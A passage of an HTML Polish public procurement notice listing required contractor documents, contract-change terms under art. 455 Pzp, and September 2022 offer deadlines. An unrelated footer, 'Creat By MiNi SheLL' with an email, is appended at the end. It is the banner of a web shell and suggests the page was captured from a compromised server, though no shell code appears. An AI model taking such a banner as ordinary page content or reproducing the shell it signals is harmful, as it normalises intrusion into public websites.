odpowiednio<br/>spełnianie warunków udziałów w postępowaniu lub kryteriów selekcji, w zakresie, w jakim Wykonawca powołuje się na jego osoby<br/>(jeśli dotyczy)<br/>3) Odpis lub informacja z Krajowego Rejestru Sądowego (KRS) lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>(CEIDG), w zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem, jeśli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji.<br/>4) Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109<br/>ust. 1 pkt 1 ustawy Pzp, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert w postępowaniu, a w<br/>przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym<br/>dokumentem - dokumentów potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał<br/>płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub że Wykonawca zawarł<br/>wiążące porozumienie z właściwym organem w sprawie spłaty tych należności;<br/>5) Informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp oraz w zakresie<br/>określonym w art. 109 ust. 1 pkt. 2 lit. a-b oraz art. 109 ust. 1 pkt 3, ustawy Pzp wystawiona nie wcześniej niż 6 miesięcy przed<br/>upływem terminu składania ofert w postępowaniu.<br/>6) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 pkt 3 i art. 109<br/>ust. 1 pkt 1 i 5-10 ustawy PzP;<br/>7) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275) z innym<br/>Wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej –<br/>wg wzoru stanowiącego Załącznik nr 8 do SWZ (oryginał).<br/>lub<br/>odpowiadające im dokumenty zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. z 2020 r. poz. 2415).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w Roz. VII ust.1<br/>pkt 1), składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z<br/>oświadczeniem, o którym mowa w Roz. VII ust.1 pkt 1), także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby – wg. wzoru stanowiącego Załącznik nr 7 do SWZ<br/>(oświadczenie, o którym mowa w Roz. VII ust. 1 pkt 2) SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający, zgodnie z art. 455 ust. 1 pkt. 1 ustawy Pzp, przewiduje możliwość zmiany zawartej umowy, bez<br/>przeprowadzenia nowego postępowania o udzielenie zamówienia, niezależnie od wartości zmiany, w przypadku:<br/>1) zmiany stawki podatku VAT: cena netto nie ulegnie zmianie, a cena brutto ulegnie zmianie, w wysokości i w terminie<br/>wynikającymi z aktu prawnego wprowadzającego nową stawkę podatku VAT,<br/>2) zaistnienia okoliczności o charakterze siły wyższej, przy czym pod pojęciem „siły wyższej” rozumie się wszelkie zdarzenia<br/>o charakterze nadzwyczajnym, niemożliwe do przewidzenia i zapobieżenia, a w szczególności katastrofalne działanie sił<br/>przyrody, wojny, mobilizacje, zamkniecie granic, strajki, stan zagrożenia epidemicznego lub stan epidemii i związane z nimi<br/>obostrzenia prawne: zmniejszenie zakresu świadczonych usług w sposób wskazany przez Zamawiającego ze względu na<br/>zmniejszone potrzeby Zamawiającego;<br/>3) zmniejszenia zakresu świadczonych usług wskutek siły wyższej: wynagrodzenie ulegnie zmniejszeniu proporcjonalnie do<br/>zmniejszenia zakresu świadczonych usług.<br/>Zamawiający jest ponadto uprawniony do dokonania zmian postanowień Umowy w przypadkach określonych w art. 455 ust. 1 pkt. 2 b) i c), pkt. 3 oraz pkt. 4, jak też art. 455 ust. 2 ustawy Pzp.<br/>Zmiana umowy wymaga formy pisemnej pod rygorem nieważności.<br/>W przypadku złożenia oferty wspólnej, do wzoru umowy Zamawiający wprowadzi postanowienie<br/>o odpowiedzialności solidarnej za wykonanie umowy podmiotów składających ofertę wspólną <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-30 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać na zasadach opisanych w Roz. VIII SWZ. Oferta musi zostać złożona przy użyciu miniPortalu (https://miniportal.uzp.gov.pl)</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-30 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com